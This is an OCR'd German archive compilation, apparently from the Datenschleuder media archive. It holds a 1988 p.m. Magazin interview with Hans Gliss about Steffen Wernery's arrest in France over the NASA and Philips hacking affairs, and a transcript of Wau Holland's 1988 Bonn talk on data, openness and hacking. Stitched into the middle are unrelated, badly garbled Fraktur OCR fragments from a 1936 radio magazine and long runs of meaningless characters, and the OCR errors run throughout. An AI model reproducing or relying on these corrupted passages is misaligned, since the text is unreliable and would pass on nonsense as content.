PMC; Was ist denn bei Philips an Scha¬
den entstanden?
Gliss: Es gibt da die wüstesten Behaup¬
tungen. Über Schäden in Höhe von vier
Milliarden Francs* wird spekuliert; daß
Daten zerstört worden seien; daß For¬
schungsprojekte ausgespäht wurden;
und daß auf militärisch wichtige Daten
zugegriffen worden sei. Ich mag mich
an diesen Spekulationen nicht beteili¬
gen, ich berichte hier nur, was in der Pa¬
riser Gerüchteküche umlief. Ob sich der
Schaden wirklich beziffern läßt, ob das
jemals genau geklärt wird, ist eine an¬
dere Frage.
PMC: Weshalb hat Wernery das Risiko
auf sich genommen, nach Frankreich zu
fahren?
Gliss: Er sollte als Referent auf dem SE-
CURICOM-Kongreß auftreten und dort
über die Vorfälle im NASA-Netz berich¬
ten. Wir haben uns ja schon lange vorher
erkundigt, ob für ihn Gefahr bei der Ein¬
reise besteht, ob etwas gegen ihn vor¬
liegt - das wurde dem Veranstalter ge-
■Rund 1,3 Milliarden Mark,
genüber verneint. Aber Wernbry hat ei¬
nen großen Fehler gemacht. Er hat der
Firma Philips einen Brief geschickt, mit
einem Hinweis auf seinen Auftritt zum
Thema NASA-Hack, und daß es nützlich
wäre, sich zu einem vertraulichen Ge¬
spräch zu treffen. Denn er kenne die
Umstände der Philips-Vorfälle über¬
haupt nicht.
PMC: Und was meinte Philips dazu?
Gliss: Es wurde ein Termin vereinbart,
aber am Flugzeug erschien ein Emp¬
fangskomitee der Polizei.
PMC; Mit welcher Begründung?
Gliss: Der Untersuchungsrichter sagte
Wernerys Anwältin, man habe ihm zwar
nichts Konkretes nachweisen können,
man wolle ihn aber dabehalten, um
durch weitere Recherchen eine Mitwis¬
serschaft nachzuweisen. Außerdem
wurde der Brief an Philips als Erpres¬
sungsversuch gewertet, und das sei ein
hinreichender Haftgrund.
PMC: Aber wirkliche Hinweise auf straf¬
bare Handlungen gibt es nicht?
Gliss; Nein.
PMC: Wirklich überhaupt nichts?
Gliss: Ich weiß wirklich nichts davon.
Und meine Einschätzung von Wernery
ist; Hätte er sich nur das Geringste vor¬
zuwerfen gehabt, dann wäre er sicher
nicht nach Frankreich gefahren. Er ist ja
nicht dumm.
PMC: Nun hatte es ja schon zuvor in
Deutschland Ärger gegeben. Haus¬
durchsuchung beim Chaos Computer
Club und auch in Wernerys Wohnung.
Gliss: Selbst die deutschen Behörden
waren von der Aktion der Franzosen völ¬
lig überrascht. Die Staatsanwaltschaft
Hamburg hat selbst eine Art Ehrenerklä¬
rung für ihn abgegeben. Deren Ermitt¬
lungen haben ergeben, daß er weder
Tater noch Mittäter in dieser Angele¬
genheit ist.
PMC: ln der Öffentlichkeit hält sich
aber immer noch die Ansicht, der
NASA-Hack ginge auf das Konto der
Hamburger Computer-Chaoten.
Gliss: Diese Ansicht ist falsch. Die
NASA-Hacker haben beim Chaos Com¬
puter Club Beweismaterial abgeliefert.
Dieses Material ist auf ausdrücklichen
Wunsch eines deutschen Sicherheits¬
dienstes gesammelt worden. Der hat Ko¬
pien davon bekommen und dafür ge¬
sorgt, daß die Amerikaner, vor allem die
NASA und DEC als verantv/ortlicher
Hersteller, informiert wurden. Ich bin
damals Zeuge dieser Verhandlungen
gewesen. Nach sechsmonatigen Ermitt¬
lungen wurde am 16. März Wernerys An¬
walt mitgeteilt, Wernbry sei nicht tatver¬
dächtig. Vor allem was die französischen
Vorwürfe angehe, die ja nichts mit dem
NASA-Netz zu tun haben, gebe es keine
Anhaltspunkte. Philips und NASA sind
verschiedene Vorfälle. In den Augen
der Staatsanwaltschaft, so hieß es, gelte
Wernery als eine Art Informationsdreh¬
scheibe.
PMC: Hat sich Wernery die fatale Situa¬
tion nicht selbst zuzuschreiben, weil er
nie klare Grenzen zwischen Hacker und
Berichterstatter gezogen hat?
Gliss; Aus meinen Gesprächen mit ihm
weiß ich, daß er die Grenzen sehr klar
sieht. Der Unterschied ist, ob man in of-
fene Rechner eindringt oder Daten aus¬
späht. Wenn der Chaos Computer Club
diese Grenze nicht scharf sieht, dann
darf er sich nicht wundern, wenn sein
Bild in der Öffentlichkeit immer wieder
in der Nähe krimineller Machenschaf¬
ten angesiedelt wird.
PMC: Auch in offenen Netzen ist das
Äusspähen strafbar...
Gliss: Richtig, nach Paragraph 202a
Strafgesetzbuch. Nur gibt es eine Reihe
von Netzen, in denen keine geheimen
Daten drinstehen. Die NASA hat ja
selbst nach dem Hack im Netz gesagt,
das sei keine Sicherheitsbedrohung ge¬
wesen. Die Daten seien vergleichbar
mit öffentlichen Bibliotheken mit freiem
Zugriff für alle Wissenschaftler. Was ich
übrigens für eine dumme Aussage der
NASA halte. Denn zwischen dem Lesen
frei zugänglicher Daten im Netz und der
Veränderung des Betriebssystems lie- I
gen Welten. Im NASA-Computer gelang
den Hackern, wie bekannt, eine tiefgrei¬
fende Änderung des Betriebssystems
durch die berühmt gewordenen »troja¬
nischen Pferde«.
PMC: Die Hackerszene geriet durch
den Vorfall in Aufruhr. Es hat sogar Dro¬
hungen gegeben, daß man jetzt mal
wirklich ernst machen wolle.
Gliss; Ich habe durch einige Kontakte
erfahren, daß das wohl keine leeren
Drohungen sind. Das wäre aber wohl
das Schlimmste, was man Wernery in
seiner Situation antun könnte. Das hieße
doch, aha, jetzt schlagen die Komplizen
zu. „ ,
PMC: Bei den betroffenen Rechnein
handelt es sich fast ausschließlich um
VAX-Rechner der Firma DEC. Ist durch
die Vorfälle nicht jetzt die VAX zum er¬
klärten Gegner geworden, an der die
Hacker ihre Wut auslassen, egal, wer sie
betreibt? , .nu-
Gliss: Mit dieser ganzen Aktion hat Phi¬
lips der Firma DEC sicherlich einen Bä¬
rendienst erwiesen. Das Problem ist
doch folgendes: Wenn ein Betreiber
seine Anlage nicht schützt, dann ver¬
sucht er, wenn er blamiert ist, die Schuld
dem Hersteller zuzuschieben. Es gibt ln
stallationen, wo Hacker versucht haben,
reinzukommen, aber von den Systemen
prompt abgewiesen wurden - weil die
Systeme sicher organisiert sind,
PMC: Die Schuld liegt Ihrer Meinung
nach also bei den Betreibern der Änla-
gen. , .
Gliss: Ein Vergleich: Wenn Sie beim Au¬
tofahren zu faul sind, den Blinker zu be¬
nutzen, und dann passiert was, dann
sind sie nach landläufiger Auffassung
auch schuld. Bei Computern ist es üb¬
lich, daß die Betreiber den Spieß um¬
drehen. Entweder ist der Hersteller
schuld oder der Idiot, der mir reingefah¬
ren ist. Und die Zeugen, die da rumste¬
hen, sind auch noch schuld, weil sie dar¬
über geredet haben.
PMC: Damit meinen Sie den Berichter¬
statter Wernery.
Gliss: Im vorliegenden Fall betreibt da
jemand einen Rechner, in dem sich be¬
liebig die Hacker tummeln können, und
sucht dann nach Schuldigen.
PMC: Ist es denn so schwierig, einen
Rechner vor unerwünschten Eindring¬
lingen zu schützen?
Gliss: Natürlich nicht, bei Polizei und
Militär in Deutschland sind die Rechner
wasserdicht, und auch bei zahlreichen
Industriebetrieben.
PMC; Wie viele Rechner, die an den
Netzen hängen, schätzen Sie denn
i.'Hansj.G!iss^;ist;,.OhefI:edaWeul^’d
jFjachzetechrift^^'i »Datenscliiito-Befa-.L
'' 'iter«. Er lud Wemöjy aIs,JRefereffi !,
...Steffen,: Wer^
s^glieä-'des.lChaös-'ComputerACIu^^^^^
i^'Er.'"'MP:der'.:Hackerei.?b^^^
durch Versäumnisse der Betreiber als
schlecht gesichert ein?
Gliss: Das weiß ich nicht. Aber der
NASA-Hack brachte ja zutage, daß
selbst einige renommierte Forschungs¬
institute mit geklauter Software arbei¬
ten. Die haben sich einen gebrauchten.
Rechner beschafft und das Betriebssy¬
stem vom Kollegen draufgespielt. Die
waren nie in der Kartei des Herstellers.
Das wirft ein Licht auf die Sorgfalt, die
hier waltet. Daß es hier Probleme mit
der Sicherheit gibt, wundert mich nicht.
Aber die Leute sollen dann bitte nicht
auf die Hacker schimpfen.
PMC: Wie einfach kommt man denn in
einen schlecht gesicherten VÄX-Rech-
ner rein? Schaßt das jeder oder nur ein
Spezialist?
Gliss: Ich dachte bis vor kurzem, daß
man dazu wesentliche Erfahrungen mit
VAXen braucht. Wie ich jetzt weiß, ge¬
nügt offenbar die Kenntnis umfangrei¬
cher Systembroschüren und eine ge¬
wisse Begabung, ln einer Münchner
Mailbox wurde ein Dokument gefunden,
das genau beschreibt, wie man angeb¬
lich in schlecht gesicherte VAXen übers
Telefon reinkommt. Das ist nicht der nor¬
male Weg, aber nach Ansicht von Si¬
cherheitsexperten dürfte es funktioniert
haben. Der Autor hat das nach eigenem
Bekunden aus frei erhältlichen System¬
broschüren extrahiert und bereits vor
über zwei Jahren in jener Mailbox veröf¬
fentlicht. Das wurde nach der Entdek-
kung vor einem halben Jahr natürlich ge-
löscht.
PMC: Was werden die Hacker jetzt
nach Ihrer Meinung konkret unterneh¬
men?
Gliss; Ich hoffe, daß sie ihre eigene Posi¬
tion überdenken und sich auf Gebieten
austoben, , auf denen sie nicht straffällig
werden können. Da gibt es wahnsinnig
große Betätigungsfelder wie Virenpro-
gramme, Systemoptimierung. Die da auf
ihren Hacker-Status stolz sind, die sollen
bitte mal erwachsen werden. Der Pali
Wernery beweist, daß das Indianerspiat
zu Ende ist.
PMC: Und was rät der Sicherheitsex¬
perte Gliss den Betreibern von Anla¬
gen?
Gliss: Die sollten sich in vielen Fällen
erst einmal Asche aufs Haupt streuen
und eine Sicherheitsanalyse machen
Und bevor sie auf Hacker und Hersteller
schimpfen, sollten sie Ihre individuell«
Risikolage prüfen und nachsehen, wa «5
der Hersteller zur Verminderung a'nbie
tet. Und notfalls noch einiges draufsf^'
zen. Weshalb installieren DV-BetreiK^^'
mit sensiblen Anwendungen nicht
Rückrufautomaük, wenn sie die
ner schon ans Netz hängen?
PMC: Die VAXen gelten als sehr siche
sofern sie korrekt installiert sind.
steht's da bei anderen Systemen?
Gliss: Man muß hier unterscheideri
Wenn das System nicht an einem Nej,
hängt, völlig abgeschottet ist, dann muß
man sich nur um die internen Benutz^j.
kümmern. Das ist einfacher. Aber Wenn
Leute von außen Zugriff haben, dann hm
es keinen Sinn, einen Selbstbedienungg,
laden ans Telefon zu hängen. Beim Be¬
triebssystem UNIX etwa gibt es hier
einige Befürchtungen.
PMC: UNIX unsicher? Wer behauptet
das?
Gliss: Unter Informatikern ist derzeit
eine Diskussion im Gange, welche Si¬
cherheitseigenschaften man von UNIX
in der Standardversion überhaupt er¬
warten kann. Und es gibt Stimmen, wo¬
nach innerhalb von UNIX einfach zuviel
erlaubt ist, um absolut sichere Kontrolle
zu bekommen. Da muß man auf Ergeb¬
nisse dieser Diskussion warten. Es exi¬
stiert schon eine sichere Version vop
UNIX, die soll aber mit der Ausgangs¬
version nur wenig zu tun haben, 54“
aus: p.m. Magazin
I
i
i
il
1
I
I
I
1
I
1
I
I
I
i
I
Aus dem Medienarchiv der Datenschleuder. Korrigierte Abschrift
eines Vortrage beim Forum Jugend und Technik ( 16 .- 17 . April I988)
in Bonn, Erich-Ollenhauer-Haus.
Organisiert von den Jusos in der SPD
Sonntag, 17 - April I988 9:30
DATEN -- AUFZUCHT UND PFLEGE
(Wau Holland)
Ich habe das Motto "Daten — Aufzucht und Pflege" und möchte anfangen mit
einem Zitat aus Rolling Stone, November 1987. Da schildert einer so eine
Rundfahrt durch Deutschland mit dem Auto, wo er den Eindruck hat, daß schon
die Blätter, die von Bäumen fallen, gucken, als würden sie zuviel Freiheit
haben. Und die Landschaft schildert er als eine einförmige Landschaft mit
lauter gleichgeschalteten Leuten, die aussehen, als seien es nur Roboter.
Die in die Landschaft reingestellt sind, um das ganze .so ein bißchen
scheinbar zu beleben.
Das ist eine negative Zukunftssicht von der Entwicklung:
daß die Computex immer flexibler werden
und die Menschen immer roboterhaftem.
Mit ein Grund dafür, weshalb der Chaos Computer Club eben CHAOS Computer
Club heißt. Weil es unser Ansatz ist, da etwas schöpferisches
dagegenzusetzen, was nicht diesen aufgeprägten, festen, hierarchischen
Strukturen entspricht. In der Art und Weise hat sich dieser Club seit der
Gründung I98I entwickelt und eine Menge von Aktionen gemacht. Wir haben uns
bemüht, den verschiedensten Seiten gerecht zu werden und haben eine Sache
gemacht, die unter Journalisten allgemein absolut umstritten ist.
Wir haben uns, bevor die Geschichte mit dem NASA-Hack öffentlich wurde, an
das Bundesamt für Verfassungschutz gewandt, weil die ganze Geschichte zu
heiß war, und weil es uns angenehmer war, daß unsere lieben amerikanischen
Freunde und Besetzer den NASA-Hack nicht aus den Medien erfahren. Wir haben
die merkwürdige Erfahrung gemacht, daß die Leute von DEC-Deutschland das
erst geglaubt haben, als es im Fernsehen gekommen ist. Und NICHT die
Vorabinformation durch uns.
Das ist schon ein ziemlich starkes Stück.
Wir haben des weiteren dabei erfahren, daß eine Reihe von
Großforschungsunternehmen hier Raubkopien - wie es so heißt - von
Betriebssystemsoftware gefahren haben.
An der Stelle stellten wir fest, daß wir dadurch, daß wir uns bemüht haben,
von den Hackern, die wir nicht kennen, die Rechnerliste zu kriegen und die
Rechnerliste dann an den Hersteller weitergeleitet wurde, daß wir da schon
wieder, also naja so datenschutzrechtlich in eine Grauzone vorgestoßen
sind.
Und in diesem ganzen Zusammenhang, an dem Steffen eben auch journalistisch
mit mir beteiligt war — also wir beide haben eigentlich die Entscheidung
getroffen, uns da eben auch ans Innenministerium zu wenden — haben die
Franzosen etwas anders reagiert und ihn bei der Einreise zu einer
Sicherheitsfachtagung, zu der er als Eröffnungsredner geladen war, in
Frankreich verhaftet.
Er sitzt dort jetzt seit vier* Wochen. Das ganze kostet alles auch eine
Menge Geld. Wir können da um Spenden bitten.
jwijuso.txt 880519
Und um das jetzt nicht einfach so in den Raum zu stellen; Das, was wir
mit Steffen zusammen - an praktischem Know How erarbeitet haben, an
Computer und politischen Einsatz davon, das war ein halbes Jahr Arbeit,
hier in Bonn, in diesem grauen Hochhaus Tulpenfeld, was die Politik so
schlecht macht, weil dieses grau einfach Leben tötet und ungeheuer viel
Kraft aussaugt. Da haben wir eine Studie gemacht, über Computerisierung im
Bundestag ("Trau keinem Computer, den du nicht (er-)tragen kannst." Der
Grüne Zweig 117, ISBN 3“9258-117“^)• Und jetzt, wo es, na, bald zwei Jahre
her ist, wird die so langsam verstanden - um es mal etwas böse zu
formulieren. Das Ding kostet 7 Mark 50 , da oben sind noch 100 Stück und
wenn eineR noch eine Spende dazugibt, dann nimmt siEr zum einen was von der
Veranstaltung mit - was inhaltliches - und zum anderen hilft das auch.
Daten und Informationen - was ist das eigentlich?
Ein Beispiel dafür: Bei einer Bank waren am Bargeldautomaten des Nachts
viele unregelmäßige Abhebungen. Und die Bank wußte überhaupt nicht, warum.
Sie hat erstraal versucht, durch Listenabgleich rauszukriegen, ob da
irgendwelche Kunden irgendwie besonders auffällig waren oder irgendwelche
Konten besonders belastet. Aber das ergab alles nichts. Das war nicht
schlüssig.
Dann haben die einen Privatdetektiv eingeschaltet und der Privatdetektiv
hat binnen kürzester Zeit festgestellt, daß das alles gar nichts besonderes
war, weil der Bargeldautomat verkehrsgünstig gelegen war zum nächsten
Straßenstrich.
So entstehen Daten quasi aus dem Nichts.
Auf einmal hatte die Bank eine Liste ihrer Bankkunden... (großes oeiächver)
Diese Entstehung von einer auf einmal brisanten Datei ist etwas ziemlich
typisches, das passiert oft in vielen Fällen.
Wer in der politischen Arbeit so auf dieser unteren Funktionärs- und
Kärrnerebene wirkelt, weiß, welche Kraft es ist, jeden Scheiß, der
irgendwie kommt, zu archivieren, aufzuschreiben und irgendwann dann in die
jeweiligen Kisten -- bis in die Schmutzkiste — da rein zu machen, um das
irgendwann mal zu verwenden.
Auf einer großen Veranstaltung sagte einer von Coca-Cola über die
Geschichte des Unternehmens; Am Anfang haben sie jahrelang nur Daten
gesammelt, gesammelt, gesammelt. Und irgendwann war es soweit: dann wurden
aus den Daten Informationen. Das ist eine quasi kontinuierliche
Entwicklung, die aber irgendwann umkippt. Da waren es auf einmal
Informationen über Marktentwicklung, über Produktplanung und und und, und
wurden entsprechend eingesetzt.
Was wir hier in der BRD an Daten zur Verfügung haben, ist außerordentlich
wenig. Der Punkt der Aufzucht und Pflege von Daten ist in den allerersten
Keimen verhaftet. Auf der einen Seite wird den Kids von Politik und
Industrie in die Köpfe geklopft: Wenn ihr nicht brav Computer lernt, gehört
ihr zum sozialen Schrott, weil ihr mit der Zukunft nicht klarkommt. Wenn
dieselben Kid's rangehen, und versuchen, sich das Wissen der Welt, was in
den Datenbanken der Welt lagert, zu greifen, kriegen sie auf die Finger
geklopft, bzw. an der Stelle wollen die Franzosen an Steffen — das ist
unser Eindruck — ein abschreckendes Beispiel praktizieren.
jWljUSO.txt 880519
In Amerika ist die
recycelten Hacker .
Exis tenz grundlage
fertig sind, gibt
hat, diese Leute
Arbeitsverhältnis,
Situation noch etwas härter. Da gibt es den Begriff der
Die Leute werden gekrallt, eingesperrt, ihnen wird die
entzogen. Und wenn sie dann finanziell und persönlich
es in den USA eine Firma, die sich darauf spezialisiert
aus dem Knast "frei"zukaufen. Die kommen dann in ein
wo sie mit dem absoluten Zwie-Denk konfrontiert werden.
Das ist eine negative Utopie. Diese negative Utopie w,ollen wir verhindern -
auch wenn es bislang nicht gelungen ist, in die Datenschutzgesetze die
Straffreiheit bei Selbstanzeige reinzubringen, so wie es im Steuerrecht
möglich gewesen ist.
Hacken: was es sonst noch an Gesichtspunkten gibt.
Die Hackev sind ein gesellschaftliches und politisches Potential, weil sie
als Bevölkevungsminderheit über die ständig wachsende Datenmaschinerie
lachen können. Der Steffen hat mal formuliert: Bei den Hackern ist es so,
da sitzt die Intelligenz nicht hinter dem Bildschirm, sondern vor der
Tastatur. In diesem Sinn ist auch eine Rede und eine Redevorbereitung, wenn
sie durch Computerunterstützung vorgenommen wird — wie es Guggemos
formulierte, daß er seinen Vortrag nicht ohne Computerunterstützung hätte
halten können -- problematisch. Denn das läßt darauf schließen, daß er eine
Textbausteinbank verwendet. Und wenn man das konsequent weiterdenkt, könnte
man den Juso-Bundesvorsitzenden durch ein Expertensystem
Dii Verwendung^von"Compu'terfi'’¥ur* die Öffentlichkeit, für die Öffnung, das
was wir als Hacker und Hacksen fordern, offene Netze, die freie Weitergabe
von Information, den freien Fluß von Informationen, hat zu unserer
Überraschung starke Unterstützung von der CSU gekriegt.
In den Veröffentlichungen des Bundesinnenministeriums steht drin:
Datenschutzgesetze müssen durch Datenöffnungsgesetze ergänzt werden. Erste
Lesung des Bundesar chiv gesetzes im Deutschen Bundestag. (F.5Lcksimiie BiMiPubUk.j
Wehn man sich die ganzen Sachen, die dalTincer stecken, haher anguckt, dann
ist des Pudels Kern, daß die Daten der Bürgerinnen und Bürger dem Staat
zugänglich gemacht werden sollen. ZAG: Lauschangriffe des Staates auf die
eigene Wohnung sollen gesetzlich sanktioniert werden.
Und auf der anderen Seite sollen in den Archiven die Namen geschwärzt
werden, damit die ganzen Geschichten a la Waldheim oder bezogen auf die
Verwandtschaft von Franz Josef Strauß und ähnliches, auch nach 40 Jahren
Lagerfrist irgendwie nicht rauskommen. Weil: die Leute leben ja noch, und
deren Persönlichkeit muß geschützt werden.
Das ist die politische Realität hier.
Und dem etwas entgegenzusetzen durch eine wirkliche Datenöffnung, durch
Datenbanken, die das, was an Wissen existiert, zur Verfügung stellen , ist
eine verdammt schwierige politische Aufgabe. Für alle Parteien. Da geht es
der SPD im Verhältnis genauso schlecht wie den Grünen. Die haben beide
gewisse entwickelte interne Hierarchien.
Freigabe von Information kippt Hierarchien.
Wenn ich gut 500 Jahx'e zurückdenke, zu Zeiten Gutenbergs, der hat den
Buchdruck erfunden. Und vorher war jeder schreibende Mönch Herr über
Produktionsmittel: er schrieb die Bibel ab. Der Inhalt war vorgegeben. Die
Klöster waren enzyklikengesteuerte Fabriken mit karger bis üppiger
Ausstattung. Wächter waren nur bedingt notwendig, man schlug sich selbst
und die Gläubigen gingen freiwillig zur Datenabgabe, zur Beichte.
jwijuso.txt 880519
Dann kam Gutenberg und erfand den Buchdruck. Plötzlich konnten -- trotz der
Konzernsprache Latein -- viel mehr Menschen Wissen erlangen. Und wenn es
"nur" die Bibel war. Es dauerte 50 Jahre, bis Luther sein Thesen-Flugblatt
medienmäßig effektiv benutzen konnte. Etwa 200 Jahre nach Gutenberg begann
Diderot und d’Alembert in Frankreich mit der Herausgabe einer 35bändigen
Enzyklopädie. Dagegen gaben die Päpste Enzykliken heraus — Rundschreiben
über aktuelle Glaubens- und Sittenprobleme. Die Enzyklopädisten dagegen
erstellten eine umfassende Darstellung des Wissens der Zeit in
systematischer Anordnung; eine hervorragend illustrierte Beschreibung der
damals modernsten Produktionsmittel.
Ganz vorn, am Anfang, ist natürlich auch beschrieben, wie man druckt, wie
man sich eine Druckmaschine baut und das ganze macht, („nd ^ ^
Dieses Werk störte die Kreise des Papstes und er verbot es. Das Verbot half
dem Papst, Zeit zu schinden. Haltbar, also praktisch durchsetzbar, war
damals das Verbot nur kurze Zeit.
Der Chaos Computer Club ist intern ähnlich strukturiert wie meinetwegen
eine Universität. Da gibt es den Bereich der Forschung und da gibt es den
Bereich der Lehre. Das heißt, wir bemühen uns, wieder rauszulassen, was an
an Wissen irgendwie ansammelt wurde. Wir bemühen uns, diese Zeitspannen
dazwischen verhältnismäßig kurz zu machen. Wir erkennen gewisse
gesellschaftliche Strukturen an. Von daher gibt es meinetwegen eine
Vorabinformation an den Verfassungsschutz.
Aber bei dieser Entwicklung von der Datenmaschinerie von vor 5 OO Jahren zu
heute werden die Mittel, das Wissen zu sammeln und weiterzugeben, deutlich
gebremst. CD-Roms etwa ... da gibt es gigantische Copyrightprobleme. Also
was mich persönlich interessiert, weil ich mit Sprache zu tun hab, Wahrig's
großes etymologisches deutsches Wörterbuch ist auf CD-Rom vorhanden. Aber:
es ist nicht erhältlich, weil der Verlag es nicht freigibt.
In dem Moment, wo so ein Werk über die Sprache frei ist, kann der Verlag
ouasi keine Folgegeschäfte mehr machen. Das ist deren Befürchtung. Und in
ähnlicher Art und Weise ist es mit einer Reihe von anderem Wissen, was
zurückgehalten wird.
ist. sind öffentlich zugängliche Datenbanken; ähnlich wie es
^ff^y,tlTnhe Bibliot heken gibt, wo man an das Zeug, was offenes Wissen ist_ .
was das Wissen dev Zeit ist, eben ran kann.
In unserem Rangehen als Hacker und Häxen an die Sache ist es an einigen
Punkten so, daß -- also ich such' jetzt mal Throbbing Gristle; Genesis P.
Orridge von der Musikgruppe Throbbing Gristle formulierte das I 979 : ^
Information wird ge.s chützt. wie das Geld auf einer Bank. Manche haben .sehr
Havnn. andere nur sehr wenig. Es wird scharf bewacht , dieses Kapital T
U nser Job ist es, diese Bank zu knacken und all das zu holen, was uns
zusteht. Ohne Rücksicht auf Verluste.
In diesem Sinn ist es auch so, daß jetzt die Briefe, die Steffen
geschrieben hat, zeigen, daß er einen ganz klaren Kopf hat.
Wir haben uns seit in Kraft treten der Computergesetze und bereits schon
vorher durch Veröffentlichungen in der Datenschleuder damit
auseinandergesetzt, wie wir damit umgehen, daß da jetzt Gesetze kommen, die
uns eine bestimmte Art zu arbeiten unmöglich machen, bzw. in Untergrund,
Kriminalität und sonst was drängen.
Und unsere Reaktion war darauf, zu gucken, was wollen wir eigentlich, was
ist unser Interesse.
Stummcinstellungr von Rundfunkgeräten
'$o(le I9I: Sic ©on&erfdjflit „2f c r n | c f) c n “ ber Scui*
|d)tn 9\cid)5pojt löfet bic gcmaltigctt Uortfdjritfc «rkcmicii,
bic bic bcutid)c £fetiifcf)tcd)niti im Icyteii 3al)Te trjielt t)at.
Sic Dödig neunrtigen Silbfänger (Silbaufnal)mcgcrüic),
Die i)on Bcr Scut(d)cn 9(cid)spo[t ctftmoiig ünliijjlid) ber
Olflinpifcl)cn 6piclc in ben Sienft ber 'Mllgcmeinijcit ge-
ftclit luurbcn unb mit bcncii ber 3crnfef)programmbefricb
ber iRcidjsfcnbcIciluiig ein Sniterlcbcn ber Kampfi)alibluii»
gen om Sernfeijer ermögiidjtc, nierben ben 'Befudjcrn im
Sefriebe Dorgcfii()rt. (Srftfluniid) ift oud) bic 93erbcf[crung
ber Sernfcijbiibcr, bic non ben faljrbnrcn 3''«rnfc^iungci<
ber Scut)d)cn 9icid)spoft nad) bem 3iui|d)cnfilmDerfai)ren
nufgciiommcn unb übertragen tnerben. ^erjud)« mit 375*
Beilcnbllbcrn jeigen, bo& bei 6teigcrung bet ipunhtjal)! bic
Scrnfcljbilber rcid)er in ben Eliyclljciten roerben. — Sic
Seutfd)c iKeid)spoft crmöglid)t es ferner, «in 3etnfei)gc*
fptäd) Ecipjig.'Berlin unmittetbar aus bet 5ern(et)()üllc
ber ©tofecn Scutfd)cn ^unbfunhausftcllitng ju füllten. —
Sie an ber 5crn[ct)entiuiddung in Seutfd)lanb arbeitenben
Firmen geben im SRalimen biefer 6onbctfd)au einen Icljr*
tcid)en Ueberblick über ben 6tanb il)ter illrbciten unb ber
tion il)ncn crsielten bebcutenben 3ort[d)ritte.
llnfcr treuer spoftabonnent
.5>err 21. 9T., StrofanftoTtsroetSmeiftcr in Eub»
inigsbueg »erunglUcbit auf bem ^eimmege
bur^ ben 2(nbänger eines ^erfonenautos fo
fdimet, boS et einige Soge fpäier im Steis*
Itonftcnfiaus feinen erlittenen ^Jerlcgungen er*
tog. —
©emöB ben llnfoIl*Setfie^rungsbcbingungen
für bie 2lbonn«nlcn ber „Sun6*3nu*
ftrierten" in 6tuUgnrt aa^Ile bie SCiitt*
Icmbergift^ Sreutruetji^erung 2J.»©. inStult*
gart an bie 2Bitn)c bcs »erunglücbten ^oftabon*
nenten ben feftgefeöten 25etrog in $i)Iie non
RM. SOO.—
Stummeinsfellung durch Tollegen des Nleder-
frequenzleiles.
Es gibt noch eine andere Möglichkeit, das Gerät ge¬
räuschlos auf einen Sender abzustimmen. Jeder, der
verschiedene Sender empfangen will und deshalb ge¬
zwungen ist, das Gerät des öfteren neu einzustcllen,
meter. Instrumente für diese Zwecke sind durch den
Fachhandel zu beziehen. Dipl.-Ing. H. Kümmel
I j.(ÖTXi^e
l^nt^ntauaUdluno
Berlin 1956
Funhturmhallen
Täglich non 9-2 0 Uhr
Der VolköfcnÖcr 1936
Ehrcnhalle ' Große Inöuftrle^
fchau aller apparatebaucnöcn
Fabrlhcn Dcutfchlanös • Fern*
fehen unö Fernfprechen
Täglich Äbenöocranftaltungcn Der
Rcichorunöfunhgcfcllfchaft in Halle 2
i Et i Sä
C 4 * _y> s
^ e« S* S.
g 2 $ B CÄ
9* ^ O u 9 ^
.of
äSb|s>©
w B ß 5? ^ ^
S'f i-g s S
£ 5 a w c
■= S.‘.2 »
5 ® oo ^
•• 23 .** 35 ß 2*
St V .«>W
U WM S
■JÜ i-» *• «.. ***
> ^ Ai ohü
St’ß'T-c c
■scÄaS-
E
%. S. «'S a e
X a ^
u 5 * _ ja .
«I o
c
»S-aS
W oS
O B-'S «
^ — ä '2 :*
2^ .’§”5'
- sll
2rT ^ •-
SS
^ 52.2
_ C'S'
«I* '■S'S’c
Tis :=■ o »j
cBia
B B tt
c— u
®!§'l
h<?r
•2 eng'
Igg
l-ll
jwijuso.txt 880519
Und das Ziel ist: Social Hacking .
Das heißt, zu gucken, in was für einer Welt leben wir. Wie können wir die
verändern und wie können wir da was erreichen, ohne daß wir uns den Kopf an
der Wand blutig stoßen.
Und da gibt es doch - und das ist eine Sache, die ich an der Situation
schätze, eine Menge von Möglichkeiten, Information und Wissen zu
verbreiten, über Strukturen, die hier herrschen.
Etwa die Kommunikationspreise .
Da findet man raus: wir verschicken eine Presseerklärung zum Thema Steffen
als Rundsendung.
Wupp, sind da 6 OO.- Telexgebühren fällig.
Wir denken über das ganze betriebswirtschaftlich nach. Wir kalkulieren
das machen wir schon länger, was diese Kommunikation eingentlich kostet
und stellen dann fest, daß die Kommunikation vielleicht um den Faktor 100
bis 1000 überteuert ist.
Das heißt:
Telefonate, Telex, Telefax und so weiter müsste man jeden Preis mindestens
mal durch 100 teilen, um da mal zu einem reellen Preis zu kommen.
DAS hat politisches System.
Es geht darum, die Kommunikation von Menschen einzuschränken, um sie
politisch beherrschbar zu machen.
Und wenn man das erstmal irgendwie so geschnallt hat, ist es natürlich
klar, an welcher Stelle man da nach Lücken sucht und versucht, bestimmte
Entwicklungen voranzutreiben. Ein Aspekt davon ist auch sowas wie die
Public Domain Software, ein anderer ist, eben zu gucken, wo man
Möglichkeiten hat, seine eigenen Ideen rüberzutragen.
Und wenn ich mich dann mal so in der Politik umguck und dann in Richtung
CDU guck, das Verhältnis von CDU zu Computer, dann muß ich sagen, vor
vielleicht zehn Jahren hat die ihren ersten Computerskandal genial
bewältigt. Damals ging es um irgendwelche Spendengeschichten, und sie hat
es in den Medien durchgesetzt, daß es allgemein hieß: Schuld war der
Unterschrif tencomputer.
Das ist gutes Informationsmanagement, sowas hinzukriegen im öffentlichen
Ergebnis.
Auf der anderen Seite hat die CDU ja nun auch — ich frage mich eigentlich
immer, wo ist in dem Laden der General, bei dem Generalsekretär? Der
General bei der CDU ist so nach meiner Einschätzung der Computer. Daß da
eine Datenmaschinerie steht, ein Wang-System, was gut vernetzt ist, bis zur
Kreisebene runter, und was eben bestimmte, meinungsmachende
Pressemeldungen, für Wochen, Monate, Jahre — ja gut, also die Entwicklung
ist so chaotisch, daß man meist eh nicht viel nach vorne planen kann, aber
zumindest eben nach vorne — drin hat. Da hat sich auch irgendwie mal ein
Grüner reingehackt. Die Kohlredendatei hatte, so hieß, das Kennwort
Hannelore (Großem Gelächter)*
Also, zurück zu dem Take. Das ist eine bestimmte Macht, die dort ausgeübt
wird, die jetzt bewußt praktiziert wird. Wenn man sich mit diesen ganzen
Maschinerien näher beschäftigt, dann stellt man fest, daß man selber auch
in ähnlicher Art und Weise damit arbeiten kann.
jwijuso.txt 880519
Computer sind Nachrichtenuaffen.
